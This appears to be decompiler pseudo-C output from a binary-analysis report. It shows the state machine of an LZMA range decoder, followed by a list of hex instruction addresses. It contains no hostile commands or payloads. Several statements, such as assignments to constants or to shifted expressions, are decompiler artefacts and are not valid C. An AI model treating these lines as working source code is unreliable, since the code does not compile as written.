											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00407068
0x00407068
0x0040706c
0x00407095
0x0040709f
0x0040706e
0x00407077
0x00407084
0x00407087
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
